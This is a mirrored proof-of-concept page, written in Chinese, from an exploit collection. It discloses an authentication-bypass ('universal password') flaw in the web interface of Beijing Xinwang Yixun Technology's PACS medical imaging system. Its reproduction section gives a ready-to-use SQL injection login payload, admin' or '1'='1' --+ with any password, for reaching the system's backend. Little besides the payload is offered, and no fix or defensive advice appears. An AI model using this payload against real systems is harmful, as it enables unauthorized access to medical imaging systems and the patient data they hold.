mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 19:35:52 +00:00
23 lines
1.2 KiB
Markdown
23 lines
1.2 KiB
Markdown
|
|
# 北京新网医讯技术有限公司PACS系统web端存在万能密码漏洞
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
北京新网医讯技术有限公司,公司成立于2000年3月,注册于北京中关村科技园,为国家高新技术企业和中关村高新技术企业(简称为“双高企业”),公司作为软件企业,成为北京软件和信息服务业协会会员。公司专业从事PACS(图像存储与传输系统)和RIS(放射科信息管理系统)的研究、开发工作。北京新网医讯技术有限公司PACS系统web端存在万能密码漏洞,攻击者可通过该漏洞绕过身份认证进入系统后台。
|
|||
|
|
|
|||
|
|
# 二、影响版本
|
|||
|
|
+ 北京新网医讯技术有限公司PACS系统web端
|
|||
|
|
|
|||
|
|
# 三、特征/
|
|||
|
|

|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
```plain
|
|||
|
|
用户名:admin' or '1'='1' --+
|
|||
|
|
密码:任意
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-02-29 23:55:28
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kxcuo6orgybzgrau>
|